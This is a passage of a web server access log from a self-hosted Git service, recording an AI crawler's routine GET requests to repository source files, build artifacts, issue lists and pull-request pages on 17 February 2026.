"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:18:05:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 69335] [Gzip 17.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:18:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 44116] [Gzip 15.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:18:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&state=all&type=all" [Client 74.7.227.38] [Length 9953] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&state=all&type=all" +[17/Feb/2026:18:05:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11081] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:18:05:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11078] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:18:05:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11079] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:18:05:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11079] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:18:05:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11080] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:18:05:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp" +[17/Feb/2026:18:06:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json" +[17/Feb/2026:18:06:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:06:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:18:06:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json?display=rendered" [Client 74.7.227.38] [Length 11000] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" +[17/Feb/2026:18:06:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/Makefile" +[17/Feb/2026:18:06:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip" +[17/Feb/2026:18:06:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg?display=rendered" [Client 74.7.227.38] [Length 10871] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" +[17/Feb/2026:18:06:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10883] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip" +[17/Feb/2026:18:06:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11009] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/Makefile" +[17/Feb/2026:18:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/Makefile" +[17/Feb/2026:18:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/Makefile" +[17/Feb/2026:18:06:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/Makefile" +[17/Feb/2026:18:06:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/Makefile" +[17/Feb/2026:18:06:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/Makefile" +[17/Feb/2026:18:06:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg" +[17/Feb/2026:18:06:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg" +[17/Feb/2026:18:06:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fwatchdog.service" [Client 74.7.227.38] [Length 21955] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service" +[17/Feb/2026:18:06:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fperformance_comparison.py" [Client 74.7.227.38] [Length 27345] [Gzip 6.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py" +[17/Feb/2026:18:06:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 25896] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:18:06:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fdist%2fPostgresWatchdog.exe" [Client 74.7.227.38] [Length 18032] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:18:06:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor.spec" [Client 74.7.227.38] [Length 25877] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:18:06:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor.py" [Client 74.7.227.38] [Length 34723] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:18:06:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:06:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:18:06:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12063] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor%2fbuild" [Client 74.7.227.38] [Length 65172] [Gzip 15.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build" +[17/Feb/2026:18:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:18:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:18:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/package.json" +[17/Feb/2026:18:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:06:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:06:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:18:06:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:06:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:18:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:06:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:06:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:18:06:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:06:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:18:06:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:18:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:18:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11034] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:06:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 